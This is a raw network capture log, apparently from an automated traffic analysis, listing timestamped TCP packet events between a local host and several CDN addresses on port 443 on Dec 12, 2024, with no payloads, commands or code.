                                                                                                                                                                                                          Dec 12, 2024 00:28:47.760457039 CET49742443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.940402031 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.940746069 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.940809965 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.942254066 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.942328930 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.942624092 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.942712069 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.942754984 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.983372927 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.997172117 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.997194052 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.044522047 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.358336926 CET44349745104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.358597040 CET49745443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.358654976 CET44349745104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.359401941 CET44349744104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.359690905 CET49744443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.359721899 CET44349744104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.360335112 CET44349745104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.360413074 CET49745443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361258984 CET44349744104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361342907 CET49744443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361421108 CET49745443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361479998 CET49745443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361520052 CET44349745104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361567974 CET49745443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361598015 CET49745443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.361994982 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362046957 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362341881 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362821102 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362839937 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362915039 CET49744443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362937927 CET49744443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.362956047 CET49744443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363054991 CET44349744104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363109112 CET49744443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363221884 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363254070 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363317013 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363481045 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.363502979 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388041973 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388123989 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388169050 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388247013 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388309956 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388345957 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388345957 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388370037 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388411999 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.388456106 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.395967960 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.396044016 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.396070004 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.412630081 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.412699938 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.412722111 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.467072010 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.508651972 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.562011957 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.562030077 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.583601952 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.583684921 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.583725929 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.583744049 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.583966017 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.589936972 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.598067999 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.598151922 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.598165989 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.606096029 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.606173992 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.606187105 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.614181995 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.614259958 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.614274025 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.630234003 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.630302906 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.630377054 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.630392075 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.630834103 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.638303041 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.646327019 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.646399975 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.646477938 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.646495104 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.646562099 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.653341055 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.660566092 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.660732985 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.660753012 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.667587042 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.667767048 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.667782068 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.709847927 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.771898031 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.774060011 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.774173975 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.774239063 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.774313927 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.774461985 CET49743443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:48.774485111 CET44349743104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.600255966 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.600275993 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.600668907 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.600683928 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.600712061 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.600771904 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.601548910 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.601617098 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.602417946 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.602516890 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.602922916 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.602977037 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.603163958 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.603348970 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.603446007 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.647332907 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.648207903 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.648215055 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.648329020 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.648389101 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.696139097 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:49.696260929 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369591951 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369775057 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369796991 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369817972 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369846106 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369972944 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369972944 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.369987965 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.370044947 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.377943039 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.386495113 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.386565924 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.386571884 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.438199043 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.438206911 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.489165068 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.489236116 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.489243031 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.537425995 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.561557055 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.565340996 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.565398932 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.565406084 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573188066 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573260069 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573266029 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573276997 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573317051 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573642015 CET49748443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.573653936 CET44349748104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716291904 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716325045 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716387033 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716821909 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716909885 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716984987 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716995955 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717006922 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717164040 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717185974 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717247963 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717302084 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717339039 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717408895 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.717434883 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.933990955 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.934416056 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.934479952 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.935450077 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.935530901 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.935885906 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.935960054 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.936038017 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.936060905 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.945749998 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.945949078 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.945960999 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.947261095 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.947432995 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.947455883 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.947598934 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.947669983 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.948816061 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.948896885 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.948940039 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.948950052 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.948956013 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.949009895 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.950071096 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.950160027 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.950346947 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.950362921 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.977952003 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.993098974 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:51.993138075 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.374855042 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.374998093 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.375087976 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.375174999 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.375272989 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.375272989 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.375300884 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.382508993 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.382587910 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.382663965 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.382882118 CET49750443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.382927895 CET44349750104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.383126974 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.383183002 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.383189917 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384036064 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384135962 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384186029 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384215117 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384263992 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384284973 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384314060 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384331942 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.384383917 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.390882969 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.390952110 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.391051054 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.391443014 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.391484022 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.391485929 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.391546965 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.391552925 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.392726898 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.400743008 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.400821924 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.400841951 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.408005953 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.408080101 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.408086061 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.446660042 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.446721077 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.461596966 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.492639065 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.496397972 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.505398035 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.509448051 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.509718895 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.509782076 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.539634943 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.539655924 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.554836035 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.570899963 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.570986986 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.570993900 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.575608015 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.578989029 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.579073906 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.579129934 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.579137087 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.579181910 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.581075907 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.581275940 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.581338882 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.586779118 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.589273930 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.589339018 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.589359999 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.594897985 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.595062971 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.595086098 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.597417116 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.597476959 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.597491026 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.602818012 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.602873087 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.602879047 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.605431080 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.605503082 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.605518103 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.610754967 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.610809088 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.610815048 CET44349749151.101.66.137192.168.2.4
